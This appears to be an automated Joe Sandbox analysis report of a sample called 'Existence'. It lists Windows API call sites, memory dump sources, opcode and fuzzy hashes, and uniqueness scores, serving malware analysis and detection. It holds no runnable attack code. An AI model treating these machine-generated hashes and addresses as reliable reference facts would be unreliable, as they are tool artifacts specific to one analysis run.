• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Rect$BeepClientMessageScreenWindow
• String ID:
• API String ID: 1352109105-0
• Opcode ID: 811e67c22c03fd3b70f6d5cb75c17c8072343a26b716faaefe281eca989b611d
• Instruction ID: 373b35b5886ce86af6468dff60233a5542b2568b146102b256097415a952213c
• Opcode Fuzzy Hash: 811e67c22c03fd3b70f6d5cb75c17c8072343a26b716faaefe281eca989b611d
• Instruction Fuzzy Hash: 82418230601219DFCB91CF58C884FA9BBF5FF45314F1841ACE9559B261CB79E842CB51
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 007C2187
                                                                                                                                                                                            • Part of subcall function 00794393: GetWindowThreadProcessId.USER32(?,00000000), ref: 007943AD
                                                                                                                                                                                            • Part of subcall function 00794393: GetCurrentThreadId.KERNEL32 ref: 007943B4
                                                                                                                                                                                            • Part of subcall function 00794393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00792F00), ref: 007943BB
                                                                                                                                                                                          • GetCaretPos.USER32(?), ref: 007C219B
• ClientToScreen.USER32(00000000,?), ref: 007C21E8
• GetForegroundWindow.USER32 ref: 007C21EE
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
• String ID:
• API String ID: 2759813231-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 007341EA: _wcslen.LIBCMT ref: 007341EF
• _wcslen.LIBCMT ref: 0079E8E2
• _wcslen.LIBCMT ref: 0079E8F9
• _wcslen.LIBCMT ref: 0079E924
• GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0079E92F
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: _wcslen$ExtentPoint32Text
• String ID:
• API String ID: 3763101759-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
• GetCursorPos.USER32(?), ref: 007C9A5D
• TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 007C9A72
• GetCursorPos.USER32(?), ref: 007C9ABA
• DefDlgProcW.USER32(?,0000007B,?,?,?,?), ref: 007C9AF0
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Cursor$LongMenuPopupProcTrackWindow
• String ID:
• API String ID: 2864067406-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNEL32(?,007CDC30), ref: 0079DBA6
• GetLastError.KERNEL32 ref: 0079DBB5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0079DBC4
• CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,007CDC30), ref: 0079DC21
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast
• String ID:
• API String ID: 2267087916-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetWindowLongW.USER32(?,000000EC), ref: 007C32A6
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C32C0
• SetWindowLongW.USER32(?,000000EC,00000000), ref: 007C32CE
• SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 007C32DC
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Window$Long$AttributesLayered
• String ID:
• API String ID: 2169480361-0
Uniqueness
Uniqueness Score: -1.00%

APIs
• InternetReadFile.WININET(?,?,00000400,?), ref: 007AD8CE
• GetLastError.KERNEL32(?,00000000), ref: 007AD92F
• SetEvent.KERNEL32(?,?,00000000), ref: 007AD943
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: ErrorEventFileInternetLastRead
• String ID:
• API String ID: 234945975-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00798271,?,000000FF,?,007990BB,00000000,?,0000001C,?,?), ref: 007996F3
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrcpyW.KERNEL32(00000000,?), ref: 00799719
                                                                                                                                                                                            • Part of subcall function 007996E4: lstrcmpiW.KERNEL32(00000000,?,00798271,?,000000FF,?,007990BB,00000000,?,0000001C,?,?), ref: 0079974A
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,007990BB,00000000,?,0000001C,?,?,00000000), ref: 0079828A
                                                                                                                                                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 007982B0
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(00000002,cdecl,?,007990BB,00000000,?,0000001C,?,?,00000000), ref: 007982EB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcmpilstrcpylstrlen
                                                                                                                                                                                          • String ID: cdecl
                                                                                                                                                                                          • API String ID: 4031866154-3896280584
                                                                                                                                                                                          • Opcode ID: 5748418b73475688a4b431e41b42ab93f4f90f7c71610c630ccb85b6e87d86bf
                                                                                                                                                                                          • Instruction ID: fe6765b0d6346091a1112d60de8249fed38fdbc0a7139c4dd6f4824cac6f1eea
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5748418b73475688a4b431e41b42ab93f4f90f7c71610c630ccb85b6e87d86bf
                                                                                                                                                                                          • Instruction Fuzzy Hash: C311037A200245ABCF149F38E849E7A77A9FF49750B10802EFD02C7250EF399811C796
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,00001060,?,00000004), ref: 007C615A
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C616C
                                                                                                                                                                                          • _wcslen.LIBCMT ref: 007C6177
                                                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 007C62B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend_wcslen
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 455545452-0
                                                                                                                                                                                          • Opcode ID: ed4f1a09870fa33c80fae9aeb2e71773fb92783dc20f7ef9f2e309af8e5cb88f
                                                                                                                                                                                          • Instruction ID: 315881474eb77e735bb2d23eb04ae0d793cc1d5e483d4eeb7c45896452c9fcf9
                                                                                                                                                                                          • Opcode Fuzzy Hash: ed4f1a09870fa33c80fae9aeb2e71773fb92783dc20f7ef9f2e309af8e5cb88f
                                                                                                                                                                                          • Instruction Fuzzy Hash: CF119075600218A6DF20DF648CC8FEF77BCEB55754B14412EFA11D6082EBB8D985CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 4afff6a9dfc759cbafccda41ed482cbfcd6d642c0e2c9ebdcd738367d52dabf0
                                                                                                                                                                                          • Instruction ID: 5565d77a89435b84c3d5742126e1fdf6c5096e87ffe93fe03ce9f488f3b76a6b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4afff6a9dfc759cbafccda41ed482cbfcd6d642c0e2c9ebdcd738367d52dabf0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8301A7B2609A1A7FF6B12678ACC4F67670DDF417B8B354325BD23911D3DF688C419160
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 00792394
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923A6
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923BC
                                                                                                                                                                                          • SendMessageW.USER32(?,000000C9,?,00000000), ref: 007923D7
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MessageSend
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3850602802-0
                                                                                                                                                                                          • Opcode ID: eec72d642f1fdd2e6830ca3bcfc5356e31c664a3214825af45aa9aa77ae5a450
                                                                                                                                                                                          • Instruction ID: 489f261d2263a63f45acf7722c9b82888fbf05aa9f31555038f330e428453954
                                                                                                                                                                                          • Opcode Fuzzy Hash: eec72d642f1fdd2e6830ca3bcfc5356e31c664a3214825af45aa9aa77ae5a450
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5311273A900218FFEF11ABA4CD85F9DBB78EB08750F200091EA00B7290D6756E11DB94
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0073249F: GetWindowLongW.USER32(00000000,000000EB), ref: 007324B0
                                                                                                                                                                                          • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00731AF4
                                                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 007731F9
                                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00773203
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 0077320E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4127811313-0
                                                                                                                                                                                          • Opcode ID: 5a7f3ed6eef33c3659ca45637ff19e2a4abb01c391b223b72af1d30b09e29d0d
                                                                                                                                                                                          • Instruction ID: 02d8987fabe677eeb1b9ca32d2817e8cecefb4d1d718bc6a86c5cd894e8b7a60
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a7f3ed6eef33c3659ca45637ff19e2a4abb01c391b223b72af1d30b09e29d0d
• Instruction Fuzzy Hash: 75116A31A01019EBDF10DFA8C849DEEB7B8FB05381F508466EA02E2141C778BA91DBA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetCurrentThreadId.KERNEL32 ref: 0079EB14
• MessageBoxW.USER32(?,?,?,?), ref: 0079EB47
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0079EB5D
• CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0079EB64
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CloseCurrentHandleMessageObjectSingleThreadWait
• String ID:
• API String ID: 2880819207-0
• Opcode ID: 6f5bdbd757096919d73ad3b2324163038587f12b118e4ab60f41fa3d50af130e
• Instruction ID: 13f5100b595abb91a74d6474303811db3f26f1db735ca5f9c9a4918df450cb5e
• Opcode Fuzzy Hash: 6f5bdbd757096919d73ad3b2324163038587f12b118e4ab60f41fa3d50af130e
• Instruction Fuzzy Hash: 3F11CCB5900258BBCB11DBA89C09E9A7F6DBB45310F158269F815D3390D6B98D048761
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateThread.KERNEL32(00000000,?,0075D369,00000000,00000004,00000000), ref: 0075D588
• GetLastError.KERNEL32 ref: 0075D594
• __dosmaperr.LIBCMT ref: 0075D59B
• ResumeThread.KERNEL32(00000000), ref: 0075D5B9
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Thread$CreateErrorLastResume__dosmaperr
• String ID:
• API String ID: 173952441-0
• Opcode ID: 2b531d903764fa520fbc6305f1f83a897f51ae048c27c3e07c309e9e8ddf3652
• Instruction ID: e7dfa2bdf99b99b0d36f38a02129dd9204714a58b3fe27f2d7bb71e6f0ac2884
• Opcode Fuzzy Hash: 2b531d903764fa520fbc6305f1f83a897f51ae048c27c3e07c309e9e8ddf3652
• Instruction Fuzzy Hash: D701C472401554EBDB316FA5DC09FEA7B69EF41336F104229FD25861E0EBF88C19C6A1
Uniqueness
Uniqueness Score: -1.00%

APIs
• CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007378B1
• GetStockObject.GDI32(00000011), ref: 007378C5
• SendMessageW.USER32(00000000,00000030,00000000), ref: 007378CF
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateMessageObjectSendStockWindow
• String ID:
• API String ID: 3970641297-0
• Opcode ID: 7f7618282459d3a65615f283c2932cdbf037653e01b24063b314d8fab7ed95f5
• Instruction ID: e7e8123328a16212b206264a25a34f233e562548e665dc72e5514a1f6d7385f4
• Opcode Fuzzy Hash: 7f7618282459d3a65615f283c2932cdbf037653e01b24063b314d8fab7ed95f5
• Instruction Fuzzy Hash: 6611D2B2505508BFEF265F90CC58EEABB6DFF083A4F044129FA0452120D739DC60EBA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue), ref: 00763418
• GetLastError.KERNEL32(?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue,007D3260,FlsSetValue,00000000,00000364,?,007631B9), ref: 00763424
• LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0076338D,00000364,00000000,00000000,00000000,?,007635FE,00000006,FlsSetValue,007D3260,FlsSetValue,00000000), ref: 00763432
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LibraryLoad$ErrorLast
• String ID:
• API String ID: 3177248105-0
• Opcode ID: eebba19b1445882300a622d34e514a5260a938159b4fb7de276ac505897caf58
• Instruction ID: 5357517bc292728977a2a3aebd50bd6c49d4fe74eec08c78adec5300ceaa9ec4
• Opcode Fuzzy Hash: eebba19b1445882300a622d34e514a5260a938159b4fb7de276ac505897caf58
• Instruction Fuzzy Hash: B0017132A112669BDB324B69DC44966BF58BF05BB17214624FD07D7181DB28DD02C6E4
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 00797DE6
• LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00797DFE
• RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00797E13
• RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00797E31
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Type$Register$FileLoadModuleNameUser
• String ID:
• API String ID: 1352324309-0
• Opcode ID: 85c082a0432ccc016235a56e5da685f6871577fff0e46ed8d6aa8bd02fca37b0
• Instruction ID: 335ca9759c37e717ccbd90b2430d8d849735cbb4b13440d7bd817a57d1942d6d
• Opcode Fuzzy Hash: 85c082a0432ccc016235a56e5da685f6871577fff0e46ed8d6aa8bd02fca37b0
• Instruction Fuzzy Hash: 3C1161B52157059BEB348F64ED09F927BFCEB00B00F5085ADA616D6150E7B8ED04DB50
Uniqueness
Uniqueness Score: -1.00%

APIs
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BA8B
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BAB0
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BABA
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0079B69A,?,00008000), ref: 0079BAED
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: 7243b9da1fac71de348533b8c71b3e0945ea0412843f9dbce2bc50d4b6d2f091
• Instruction ID: f694cb965eef2cc74ffdc44bb7551af959ddc3c799932aab161644996735c55c
• Opcode Fuzzy Hash: 7243b9da1fac71de348533b8c71b3e0945ea0412843f9dbce2bc50d4b6d2f091
• Instruction Fuzzy Hash: 58110971D0062DE7CF10AFE5FA49AEEBB78FF09711F128099D941B2140DB789A50CBA5
Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 007C888E
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007C88A6
                                                                                                                                                                                          • ScreenToClient.USER32(?,?), ref: 007C88CA
                                                                                                                                                                                          • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 007C88E5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
